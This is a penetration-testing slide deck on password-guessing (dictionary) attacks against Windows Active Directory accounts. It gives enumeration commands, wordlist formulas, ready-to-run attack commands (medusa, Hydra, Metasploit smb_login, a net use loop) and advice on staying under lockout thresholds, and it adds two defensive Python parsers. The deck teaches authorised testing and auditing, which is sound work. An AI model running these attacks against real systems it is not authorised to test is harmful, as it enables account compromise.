In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:
Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack
More security blogs by the authors can be found @
https://www.netspi.com/blog/
2. Who am I?
Scott Sutherland
• Principal Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: blogs, white papers, tools, etc.
3. Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe approach to Windows dictionary attacks
• Provide security professionals with questions they should be asking their contractors
5. Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or default passwords – “It’s human nature”
• Use accounts as entry points during penetration tests
What’s the impact?
• Unauthorized access to critical:
‒ Systems
‒ Applications
‒ Data
• User impersonation
6. Are There Alternatives?
Yes.
Approaches typically include:
• Cracking password hashes offline with:
‒ Pre-computed hash libraries like Rainbow Tables
‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper
• Dumping clear text passwords for interactive sessions with Mimikatz
7. Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
8. Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for
“USERDNSDOMAIN”
• Review the registry for the default domain
9. Identify Domains: Tools
Method / Tools / Auth required
DHCP Info (Auth: No):
  IPCONFIG
NetBIOS Queries (Auth: No):
  NBTSTAT -A <IP>
DNS Queries (Auth: No):
  nmap -sL <IP Range> -oA output_rnds
  ./reverseraider -r <IP Range>
  ./dnswalk victim.com
  perl fierce.pl -dns <domainname> -threads 5 -file <domainname>-dns.output
Sniffing (Auth: No):
  Wireshark (GUI) + filter for browser traffic
  Network Monitor (GUI)
  Etherape (GUI)
RDP Drop Down (Auth: No):
  nmap -sS -PN -p3389 <IP Range>, then visit the hosts with an RDP client
10. Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
11. Enumerate DCs: Tools
Methods / Tools / Auth required
DNS Queries (Auth: No):
  NSLOOKUP -type=SRV _ldap._tcp.<domain>
RPC Queries (Auth: No):
  NLTEST /DCLIST <domain>
  FindPDC <domain> <request count>
Port Scanning (Auth: No):
  NMAP -sS -p389,636 -PN <IP Range>
NetBIOS Scanning (Auth: No):
  FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
NET GROUP Command (Auth: Yes):
  Net group "Domain Controllers" /domain
LDAP Queries (Auth: Yes & No):
  LDAP Administrator (GUI Tool)
  Hyena (GUI Tool)
  adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
15. Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Authenticated Methods
• NET ACCOUNTS Command
What does it all mean?
• Threshold, duration, and window
Example policy:
  Lockout threshold: 5
  Lockout duration (minutes): 15
  Lockout observation window (minutes): 15
16. Get Domain Lockout Policy: Tools
Methods / Tools / Auth required
RPC Queries (Auth: Yes & No):
  Enum -P <IP Address> (Auth: Yes)
  dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt (Auth: No)
NET ACCOUNTS Command (Auth: Yes):
  NET ACCOUNTS
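As an added example (not from the deck), here is a small Python parser for the text that NET ACCOUNTS prints, pulling out the three lockout values the previous slide asks you to understand. The sample output is constructed to match the command's real labels; the SAMPLE_NO_LOCKOUT variant covers the case where the threshold reads "Never", which is what Windows prints when lockout is disabled.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed sample of NET ACCOUNTS output (not captured from a real host); the
# three lockout lines use the labels the command really prints.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           15
Lockout observation window (minutes):                 15
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Constructed variant with lockout disabled: Windows prints "Never" for the threshold.
SAMPLE_NO_LOCKOUT = """\
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
The command completed successfully.
"""


@dataclass
class LockoutPolicy:
    threshold: Optional[int]  # failed attempts that lock the account; None when disabled
    duration: int             # minutes the account stays locked
    window: int               # minutes within which failures accumulate

    @property
    def enabled(self) -> bool:
        return self.threshold is not None and self.threshold > 0


# "Label:   value" lines; the label may itself contain spaces and a question mark.
_LINE = re.compile(r"^(?P<label>[^:]+?)\s*:\s*(?P<value>\S.*?)\s*$")


def parse_net_accounts(text: str) -> Dict[str, str]:
    """Turn NET ACCOUNTS output into a label -> value map, skipping lines without a colon."""
    fields = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            fields[m.group("label")] = m.group("value")
    return fields


def lockout_policy(text: str) -> LockoutPolicy:
    """Extract threshold, duration and observation window; "Never" means no lockout."""
    fields = parse_net_accounts(text)
    raw = fields["Lockout threshold"]
    threshold = None if raw.lower() == "never" else int(raw)
    return LockoutPolicy(threshold=threshold,
                         duration=int(fields["Lockout duration (minutes)"]),
                         window=int(fields["Lockout observation window (minutes)"]))


def describe(policy: LockoutPolicy) -> str:
    """One-line reading of the three numbers, in the order the slide lists them."""
    if not policy.enabled:
        return "no lockout: unlimited failed attempts are allowed"
    return (f"{policy.threshold} failures within {policy.window} min lock the account "
            f"for {policy.duration} min")


if __name__ == "__main__":
    print(describe(lockout_policy(SAMPLE_NET_ACCOUNTS)))
    print(describe(lockout_policy(SAMPLE_NO_LOCKOUT)))
```

On a domain-joined host, NET ACCOUNTS with no arguments reports the local machine's policy; NET ACCOUNTS /DOMAIN reports the domain policy, which is the one that governs domain accounts. From the defender's side a "Never" threshold is itself the finding: with lockout disabled there is no policy for a dictionary attack to respect.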
17. Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team><Number>
Popular Dictionaries
• Metasploit dictionaries
• RockYou
• FuzzDB
• John the Ripper
18. Create a Dictionary: Tools
Dictionary / URLs or Lists
Classics:
  Blank password
  Username as password
  password as password
Formulas:
  <Password><Number>
  <Companyname><Number>
  <Season><Year>
  <Sports team><Number>
  Your Brain! Think of keywords relevant to the target company / geographic location and you’ll get more out of your dictionary attacks!
RockYou:
  http://www.skullsecurity.org/wiki/index.php/Passwords
FuzzDB:
  http://code.google.com/p/fuzzdb/
  https://github.com/rustyrobot/fuzzdb
John the Ripper:
  http://www.openwall.com/wordlists/
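The classics and formulas above are just as useful to a defender. The Python check below is an added example, not part of the deck: it classifies a candidate password against the slide's patterns (blank, username as password, <Password><Number>, <Companyname><Number>, <Season><Year>, <Sports team><Number>) after peeling off the trailing digits and undoing the usual letter-for-symbol substitutions. COMPANY_TERMS and SPORTS_TERMS are hypothetical placeholders that an organization would replace with its own name, products and local teams; it is the kind of rule a password filter or a periodic password audit would apply.

```python
import re
from typing import Optional, Tuple

# Hypothetical organization-specific terms (placeholders, not a real company).
COMPANY_TERMS = {"acme", "acmecorp"}
SPORTS_TERMS = {"packers", "yankees"}
SEASONS = {"spring", "summer", "fall", "autumn", "winter"}

# Letter-for-symbol substitutions that add no real strength ("P@ssw0rd" -> "password").
LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t"})

# Trailing run of digits and punctuation: the "<Number>" or "<Year>" part of the formulas.
_TAIL = re.compile(r"[0-9!@#$%.?]*$")


def split_formula(password: str) -> Tuple[str, str]:
    """Return (normalized stem, trailing digits), e.g. "Summer2013!" -> ("summer", "2013")."""
    tail = _TAIL.search(password).group(0)
    stem = password[:len(password) - len(tail)].lower().translate(LEET)
    digits = re.sub(r"\D", "", tail)
    return stem, digits


def weak_pattern(password: str, username: str = "") -> Optional[str]:
    """Name the slide's classic or formula the password matches, or None if it matches none."""
    if password == "":
        return "blank"
    if username and password.lower() == username.lower():
        return "username as password"
    stem, digits = split_formula(password)
    if stem == "password":               # covers plain "password" and "<Password><Number>"
        return "<Password><Number>"
    if stem in COMPANY_TERMS:
        return "<Companyname><Number>"
    if stem in SEASONS and len(digits) in (2, 4):   # two- or four-digit year
        return "<Season><Year>"
    if stem in SPORTS_TERMS:
        return "<Sports team><Number>"
    return None


if __name__ == "__main__":
    for candidate in ["P@ssw0rd1", "Acme2013!", "Summer2013", "Packers12", "xK9#vT2qLm"]:
        print(f"{candidate!r}: {weak_pattern(candidate)}")
```

The check is deliberately narrow: it flags only the patterns the deck names, so it complements rather than replaces a length requirement and a breach-list lookup. Against existing accounts the same classification can be run over the results of an offline audit rather than over plaintext at set time.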
19. Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea: attempt a few passwords against all of the domain users each round, not 1000 passwords against one user
• Subtract 2 attempts from the lockout threshold (example: Lockout=5, Attempts=3)
• Wait 5 to 10 minutes beyond the observation window before the next round
20. Perform Dictionary Attack: Tools
Tools / Commands / OS
Medusa (Linux):
  medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
Bruter (Windows):
  Easy-to-use GUI; no CLI that I know of.
Metasploit smb_login (Windows and Linux):
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E
Hydra (Windows and Linux):
  hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
Batch Script (Windows):
  FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a
21. Conclusions
• There is more than one way to do everything!
• Enumerate all available options
• It’s easy to lock out accounts – respect the password policy
• Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests